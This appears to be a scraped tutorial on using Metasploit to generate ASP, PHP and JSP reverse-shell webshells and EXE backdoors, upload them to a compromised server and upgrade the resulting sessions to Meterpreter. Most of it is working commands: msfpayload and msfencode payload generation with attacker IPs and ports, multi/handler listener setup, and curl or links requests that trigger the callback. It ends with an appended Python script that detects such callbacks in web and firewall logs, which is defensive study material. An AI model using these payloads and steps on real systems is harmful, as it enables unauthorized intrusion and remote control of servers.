Metasploit: Privilege Escalation from a Webshell

Source: Internet
Author: User
Tags curl sessions

The methods involved in this article can only be tested on authorized machines.
First of all, I suggest looking up how Meterpreter is used. After reading this article you will understand why you would use MSF for privilege escalation (because MSF has the powerful Meterpreter ^_^).
Metasploit has two tools, msfpayload and msfencode. They can generate an EXE backdoor as well as a webshell in a web scripting language. You generate the webshell, set up a listener, and then access the webshell URL; if you are lucky, you get a session for further use.
The following are the specific ways to use them.
We can look through the payloads in MSF and note where they are. The following command produces a webshell in the same way that msfpayload produced a backdoor earlier, except that here a web script file is generated:
Produce the webshell:
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
Then upload the webshell to the server (this step requires upload permission),
and start msfconsole.
Enter use exploit/multi/handler,
set PAYLOAD windows/meterpreter/reverse_tcp (the PAYLOAD here must be the same as the one given to msfpayload above),
set LHOST your_ip,
and run exploit.
Then access the webshell URL; you can use curl for this: curl http://host/webshell.asp. If the exploit executes successfully, you will see that msfconsole has returned a Meterpreter shell. If you do not know how to use Meterpreter, look it up on the Internet; there is a lot of material.
However, when I used NetBox to set up an ASP environment, it always gave errors; I hope readers verify in practice that it works before relying on it.
Besides an ASP webshell, this can also produce PHP and JSP webshells; you need to specify the script type with the -t parameter of msfencode. I think the PHP type of webshell is more likely to succeed.

In addition, if you have obtained the ability to upload files to the server and execute them, you can upload a backdoor generated by msfpayload, set up a listener, execute the backdoor so that it returns a session, and then convert that session to Meterpreter. This makes it easy to use Meterpreter's various features. The steps are as follows (the premise is as explained above):
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.131 LPORT=4444 X > /root/helen.exe
2. Open msfconsole (in another terminal).
3. Set up the listener (the word "listener" sounds very advanced, but do not be intimidated by it): use exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST your_ip, set LPORT 4444, then run exploit.
4. Upload test.exe to the server.
5. Execute test.exe on the server; it returns a shell.
6. Convert the Windows shell into a Meterpreter shell: because the payload used is shell_reverse_tcp, which as the name says returns a shell, the listener receives a Windows shell (Windows command prompt) rather than a Meterpreter shell, so it has to be converted. Press Ctrl+Z to put the Windows shell in the background, use the sessions command to find the number of the shell session, and then execute sessions -u number, where number is the Windows shell session you found. This creates a Meterpreter shell that can take advantage of Meterpreter's powerful capabilities. Errors may also occur; read the error messages and search Google for parts of them.
Readers may have a question: since you can upload an EXE file, why use MSF at all? Would it not be more convenient to upload a powerful Trojan directly? I would say it is because MSF has the powerful Meterpreter.
In summary, use your imagination and try different payloads; some payloads may not work, and you may make unexpected discoveries.


When a reverse shell from a Linux host will not connect back, MSF is often the tool to use.

1. Generate the webshell file
msf > msfpayload php/reverse_php LHOST=your IP LPORT=port R > dis9.php
On my BT4 the file is generated in the /root/ directory; dis9.php can then be run.
Place dis9.php on the site where you have your shell, for example www.dis9.com/dis9.php.



2. Then set the handler module and its parameters in MSF
msf > use multi/handler // enter the multi/handler module
msf exploit(handler) > set PAYLOAD php/reverse_php // if the module is unclear, run info php/reverse_php first to read its description
msf exploit(handler) > set LHOST your IP // the same IP as the LHOST used when generating dis9.php
msf exploit(handler) > set LPORT 8080 // as above
msf exploit(handler) > exploit // execute



3. Bounce the shell
Then visit your dis9.php:
root@bt4: links www.dis9.com/dis9.php
This will bounce back a shell.
We can continue fuck all

/////////////////////////////////////////////////////////////////////////////////////////////////
JSP
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > balckrootkit.jsp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
——————————————————-
No port is set here, so the default of 4444 is used.
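
Seen from the defending side, every variant above leaves the same pair of traces: a request for an uploaded .asp/.php/.jsp file, followed moments later by an outbound connection from the web server to the listener. The following Python is an added example, not part of the original article, that correlates the two; the log lines, addresses, record layout and the find_callbacks helper are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not from the article): web access log lines and
# outbound-connection records for the same web server, e.g. from a firewall.
ACCESS_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:15:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2024:10:15:40 +0000] "GET /uploads/webshell.asp HTTP/1.1" 200 0 "-" "curl/7.88.1"',
    '203.0.113.9 - - [12/Mar/2024:11:02:10 +0000] "GET /news.jsp?id=4 HTTP/1.1" 200 811 "-" "Mozilla/5.0"',
]
OUTBOUND = [  # (time, web server address, destination address, destination port)
    ("2024-03-12T10:15:41+00:00", "192.0.2.10", "198.51.100.7", 4444),
    ("2024-03-12T11:30:00+00:00", "192.0.2.10", "203.0.113.53", 53),
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
SCRIPT_RE = re.compile(r'\.(asp|php|jsp)$', re.I)
CLI_AGENTS = ("curl", "links")  # clients the article uses to trigger the script

def find_callbacks(access_log, outbound, window_s=10, expected_ports=(53, 80, 443)):
    """Pair each script request with an unexpected outbound connection
    opened by the web server within window_s seconds of that request."""
    conns = [(datetime.fromisoformat(t), dst, port) for t, _src, dst, port in outbound]
    alerts = []
    for line in access_log:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, stamp, url, agent = m.groups()
        path = url.split("?", 1)[0]
        if not SCRIPT_RE.search(path):
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        for c_time, dst, port in conns:
            if port in expected_ports:
                continue
            if timedelta(0) <= c_time - when <= timedelta(seconds=window_s):
                alerts.append({
                    "path": path, "client": client, "dest": f"{dst}:{port}",
                    "same_host": dst == client,          # callback to the requester
                    "cli_agent": agent.lower().startswith(CLI_AGENTS),
                    "default_port": port == 4444,        # default port named in the article
                })
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(ACCESS_LOG, OUTBOUND):
        print(alert)
```

The time window and the list of expected outbound ports are tuning assumptions; a web server that has no reason to open outbound connections at all can be alerted on with an empty expected_ports.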
